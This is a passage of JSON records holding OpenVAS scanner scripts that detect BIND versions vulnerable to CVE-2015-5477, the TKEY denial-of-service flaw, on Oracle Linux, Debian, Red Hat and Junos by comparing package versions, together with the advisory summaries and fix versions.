isrpmvuln(pkg:\"bind97-utils\", rpm:\"bind97-utils~9.7.0~21.P2.el5_11.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-11T19:36:57", "description": "The host is installed with ISC BIND and is\n prone to remote denial of service vulnerability.", "cvss3": {}, "published": "2016-01-27T00:00:00", "type": "openvas", "title": "ISC BIND Denial of Service Vulnerability - 06 - Jan16", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-12-10T00:00:00", "id": "OPENVAS:1361412562310807200", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807200", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ISC BIND Denial of Service Vulnerability - 06 - Jan16\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:isc:bind\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807200\");\n script_version(\"2019-12-10T15:03:15+0000\");\n script_cve_id(\"CVE-2015-5477\");\n script_bugtraq_id(76092);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-10 15:03:15 +0000 (Tue, 10 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-01-27 15:07:28 +0530 (Wed, 27 Jan 2016)\");\n script_name(\"ISC BIND Denial of Service Vulnerability - 06 - Jan16\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"bind_version.nasl\");\n script_mandatory_keys(\"isc/bind/detected\");\n\n script_xref(name:\"URL\", value:\"https://kb.isc.org/docs/aa-01272\");\n\n script_tag(name:\"summary\", value:\"The host is installed with ISC BIND and is\n prone to remote denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error in handling\n TKEY queries can cause named to exit with a REQUIRE assertion failure.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"ISC BIND versions 9.1.0 through 9.9.7-P1,\n 9.10.0 through 9.10.2-P2.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ISC BIND version 9.9.7-P2\n or 9.10.2-P3 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_proto( cpe:CPE, port:port ) ) exit( 0 );\n\nversion = infos[\"version\"];\nproto = infos[\"proto\"];\n\nif( version_in_range( version:version, test_version:\"9.1.0\", test_version2:\"9.9.7p1\" ) ) {\n fix = \"9.9.7-P2\";\n VULN = TRUE;\n}\n\nelse if( version_in_range( version:version, test_version:\"9.10.0\", test_version2:\"9.10.2p2\" ) ) {\n fix =\"9.10.2-P3\";\n VULN = TRUE;\n}\n\nif( VULN ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix );\n security_message( data:report, port:port, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:30", "description": "Oracle Linux Local Security Checks ELSA-2015-1513", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1513", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123046", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123046", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1513.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123046\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:58:40 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1513\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1513 - bind security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1513\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1513.html\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs-lite\", rpm:\"bind-libs-lite~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-license\", rpm:\"bind-license~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-lite-devel\", rpm:\"bind-lite-devel~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb-chroot\", rpm:\"bind-sdb-chroot~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.4~18.el7_1.3\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.8.2~0.37.rc1.el6_7.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.8.2~0.37.rc1.el6_7.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.8.2~0.37.rc1.el6_7.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.8.2~0.37.rc1.el6_7.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.8.2~0.37.rc1.el6_7.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.8.2~0.37.rc1.el6_7.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:16", "description": "Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.", "cvss3": {}, "published": "2015-07-28T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3319-1 (bind9 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703319", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703319", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3319.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3319-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703319\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2015-5477\");\n script_name(\"Debian Security Advisory DSA 3319-1 (bind9 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-28 00:00:00 +0200 (Tue, 28 Jul 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3319.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"bind9 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy), this problem has been fixed\nin version 1:9.8.4.dfsg.P1-6+nmu2+deb7u6.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:9.9.5.dfsg-9+deb8u2.\n\nWe recommend that you upgrade your bind9 packages.\");\n script_tag(name:\"summary\", value:\"Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"bind9\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bind9-doc\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bind9-host\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bind9utils\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"dnsutils\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"host\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbind-dev\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbind9-80\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libdns88\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libisc84\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libisccc80\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libisccfg82\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"liblwres80\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lwresd\", ver:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:26", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-03T00:00:00", "type": "openvas", "title": "RedHat Update for bind RHSA-2015:1513-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871420", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871420", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for bind RHSA-2015:1513-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871420\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-03 15:08:02 +0530 (Mon, 03 Aug 2015)\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for bind RHSA-2015:1513-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named) a resolver\nlibrary (routines for applications to use when interfacing with DNS) and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"bind on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:1513-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-July/msg00050.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind-license\", rpm:\"bind-license~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs-lite\", rpm:\"bind-libs-lite~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.4~18.el7_1.3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.8.2~0.37.rc1.el6_7.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.8.2~0.37.rc1.el6_7.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.8.2~0.37.rc1.el6_7.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.8.2~0.37.rc1.el6_7.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.8.2~0.37.rc1.el6_7.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:10", "description": "Junos OS BIND on SRX-Series and J-Series is prone to a\nDenial of Service vulnerability.", "cvss3": {}, "published": "2016-01-18T00:00:00", "type": "openvas", "title": "Junos SRX and J-Series BIND DoS Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-11-20T00:00:00", "id": "OPENVAS:1361412562310106060", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106060", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_junos_cve-2015-5477.nasl 12431 2018-11-20 09:21:00Z asteins $\n#\n# Junos SRX and J-Series BIND DoS Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/o:juniper:junos';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106060\");\n script_version(\"$Revision: 12431 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-20 10:21:00 +0100 (Tue, 20 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-18 09:17:30 +0700 (Mon, 18 Jan 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(\"Junos SRX and J-Series BIND DoS Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_family(\"JunOS Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ssh_junos_get_version.nasl\", \"gb_junos_snmp_version.nasl\");\n script_mandatory_keys(\"Junos/Version\", \"Junos/model\");\n\n script_tag(name:\"summary\", value:\"Junos OS BIND on SRX-Series and J-Series is prone to a\nDenial of Service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable OS build is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A vulnerability in ISC BIND's handling of queries for TKEY\nrecords may allow remote attackers to terminate the daemon process on an assertion failure. This\nissue affects only SRX-Series and J-Series configured with DNS Proxy server services enabled. This\nissue can affect both standalone and HA configurations.\");\n\n script_tag(name:\"impact\", value:\"Remote attackers can cause a denial of service to the DNS proxy\nserver.\");\n\n script_tag(name:\"affected\", value:\"Junos OS 12.1, 12.3, 13.2, 13.3, 14.1, 14.2 and 15.1\");\n\n script_tag(name:\"solution\", value:\"New builds of Junos OS software are available from Juniper. As\na workaround disable the DNS proxy.\");\n\n script_xref(name:\"URL\", value:\"http://kb.juniper.net/JSA10718\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\n\nmodel = get_kb_item(\"Junos/model\");\nif (!model || toupper(model) !~ '^SRX' && toupper(model) !~ '^J')\n exit(99);\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nif (version =~ \"^12\") {\n if ((revcomp(a: version, b: \"12.1X44-D55\") < 0) &&\n (revcomp(a: version, b: \"12.1X44\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"12.1X46-D40\") < 0) &&\n (revcomp(a: version, b: \"12.1X46\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"12.1X47-D30\") < 0) &&\n (revcomp(a: version, b: \"12.1X47\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"12.3R11\") < 0) &&\n (revcomp(a: version, b: \"12.3\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"12.3X48-D20\") < 0) &&\n (revcomp(a: version, b: \"12.3X48\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n}\n\nif (version =~ \"^13\") {\n if (revcomp(a: version, b: \"13.2R9\") < 0) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"13.2X51-D39\") < 0) &&\n (revcomp(a: version, b: \"13.2X51\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"13.3R8\") < 0) &&\n (revcomp(a: version, b: \"13.3\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n}\n\nif (version =~ \"^14\") {\n if (revcomp(a: version, b: \"14.1R6\") < 0) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"14.1X53-D30\") < 0) &&\n (revcomp(a: version, b: \"14.1X53\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"14.2R5\") < 0) &&\n (revcomp(a: version, b: \"14.2\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n}\n\nif (version =~ \"^15\") {\n if (revcomp(a: version, b: \"15.1R2\") < 0) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X49-D30\") < 0) &&\n (revcomp(a: version, b: \"15.1X49\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X49-D30\") < 0) &&\n (revcomp(a: version, b: \"15.1X49\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X53-D20\") < 0) &&\n (revcomp(a: version, b: \"15.1X53\") >= 0)) {\n security_message(port: 0, data: version);\n exit(0);\n }\n}\n\n\nexit(99);\n", "cvss": {"score": 7.8, "vector": 